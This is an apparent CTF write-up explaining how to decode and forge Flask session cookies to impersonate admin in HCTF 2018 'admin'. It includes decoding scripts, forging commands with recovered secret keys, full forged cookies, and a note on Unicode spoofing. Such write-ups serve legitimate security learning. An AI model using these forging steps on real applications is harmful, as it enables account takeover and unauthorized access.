Forging a Flask session: HCTF admin
2022-07-07 13:48:00 【A traveler】
Knowledge point:
Flask stores the session on the client side, in a cookie, and only signs the data. A signature prevents tampering, but it does not prevent reading, and Flask does not encrypt the session, so all of its contents can be read on the client. (Some applications instead keep the session in a database or in files on the server.)
For challenges where only admin may read the flag, we can forge the session to impersonate admin.
Steps:
You need a forging tool. Download: https://github.com/noraj/flask-session-cookie-manager
1. First get the site's session value (F12, under Cookies), then decode the session. There are plenty of decoding scripts online; the one I use is:
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    # Cookie layout: <payload>.<timestamp>.<signature>; strip the two trailing parts
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
    decompress = False
    # A leading "." means the payload was zlib-compressed before base64 encoding
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')
    # Flask's tagged JSON serializer restores bytes, tuples etc. (no key needed)
    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))
This code is taken from the session forging tool downloadable at https://github.com/noraj/flask-session-cookie-manager, trimmed so it can be used from the command line (cmd).
Usage: python session_decrypt.py <session value>
For example:
>python session_decrypt.py eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.XyZ3Vw.OcD3-l1yOcq8vlg8g4Ww3FxrhVs
Result: {'username': b'guest'}
2. Forge the decoded session. Forging requires the secret key, so we have to find the application's key first. Usually the goal is to become admin, so just change the username to admin.
Usage: the flask_session_cookie_manager script can both encode and decode; what we need here is mostly encode:
python flask_session_cookie_manager3.py encode -s "<secret key>" -t "<decoded session, with the username changed>"
For example:
python flask_session_cookie_manager3.py encode -s "woshicaiji" -t "{'username': b'admin'}"
3. Put the forged session back into the cookie.
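To make the knowledge point above concrete (the cookie is signed, not encrypted), here is an added example that is not from the original post and not from flask-session-cookie-manager: it reads a Flask session cookie with no key at all, and checks the HMAC the way the server does, using only the standard library. It assumes Flask's default cookie settings (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1 key derivation) and plain JSON values; bytes tagged by Flask's serializer, like the b'...' values in this post, are not handled.

```python
# Added example, not from the original post: Flask-style client-side session,
# standard library only. Assumes Flask's defaults (itsdangerous
# URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1 key derivation).
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(s: bytes) -> bytes:
    return base64.urlsafe_b64decode(s + b"=" * (-len(s) % 4))


def read_session(cookie: str) -> dict:
    """Decode the payload with NO key: this is why the contents are public."""
    payload, _ts, _sig = cookie.encode().rsplit(b".", 2)
    compressed = payload.startswith(b".")  # leading "." marks zlib-compressed data
    raw = _b64d(payload[1:] if compressed else payload)
    return json.loads(zlib.decompress(raw) if compressed else raw)


def _derived_key(secret: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def verify_session(cookie: str, secret: str) -> bool:
    """The only protection: HMAC-SHA1 over "payload.timestamp" with the derived key."""
    signed, sig = cookie.encode().rsplit(b".", 1)
    expected = hmac.new(_derived_key(secret), signed, hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64d(sig))


def make_session(data: dict, secret: str, ts=None) -> str:
    """What the server does on every response (used here to build test input)."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    packed = zlib.compress(raw)
    payload = b"." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    ts = int(time.time()) if ts is None else ts
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    signed = payload + b"." + ts_b64
    sig = hmac.new(_derived_key(secret), signed, hashlib.sha1).digest()
    return (signed + b"." + _b64e(sig)).decode()
```

Anyone can call read_session on a cookie they hold; verify_session is the only check that stands between an edited payload and the server, which is why a guessable secret key (like the ones in this post) is the whole problem.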
HCTF admin as an example:
First register an account with an arbitrary username and password. The source of the password-change page contains a hint, and the useful source code is in that hint.
The challenge source has to be found from the hints given; see other writeups (wp) for the exact process. In any case, once you have the download path, look at the routes first, even though there is not much in them for this challenge.
Reference: BUUCTF [HCTF 2018]admin 1 (wow Xiaohua's blog, CSDN)
1. Copy the session and decode it:
python session Decrypt .py .eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAgnACI7ieq-71NQjG8PwFEfNsnQ.YsLkGA.-IhgD3h5Rju-WwMa4YbLJO69j6I
Result:
{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': '123', 'user_id': '10'}
Change the name value from 123 to admin, then forge.
The key is in config.py.
2. Forge directly:
python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'2204ff0b7afede85d4990273ed1b48d567972c28fa32f669f5bdda4b537e790eb65156bc67a618628a614129c59b340ab19b1497d98c47aa63440d10f6cb8eff', 'csrf_token': b'541eb96a2cd83de176040f2a25f3db095fec81c7', 'image': b'bZV6', 'name': 'admin', 'user_id': '10'}"
Result:
.eJw9kMGKwkAMhl9lydmDrfUieFmmWyokpVIdJhdRW52mHXepSrXiu--sCx5yyffz_SQP2By66mxhdumu1Qg2dQmzB3zsYAYoaU8JO0zSidHccrKKSOfjrGh6lP3AOr8ZySNWq5CGZoIO71nCFoeFIzFTlnXNydJSkgY4lK3P9KzTkIo4ILcQktKSxBFJGpnC3EjF90xjkOl0IPVpjcRTP76vbLLCCqnS-pxnec8q7llYjNiWnZnDcwT7c3fYXL6b6vQ-gYr85iun5OK7CfMIw2WLxT7EP4UsLMra-V2NqgnYrSVTX0L9_KWr3fZYvU2m_dF0_CenrfMAtqWrTzCC67nqXn-DYAzPX_3EbhA.YsLnVA.f91nHdCGekSIwqWqz9T9cba5tkA
3. Put the result above into the session cookie, refresh, and the flag is shown.
Auditing the code for this challenge also reveals another vulnerable function:
Unicode spoofing
strlower() is what makes the spoofing possible. Reference:
HCTF admin -- on Flask session forgery and Unicode spoofing (Z3eyOnd's blog, CSDN)
That is, by looking up special Unicode code points (for example, A has the variant ᴬ): if we register ᴬdmin, the function interprets ᴬ as A; when we then change the password or log in again, it interprets A as a, which achieves the goal.
There is also a race condition; see the link above.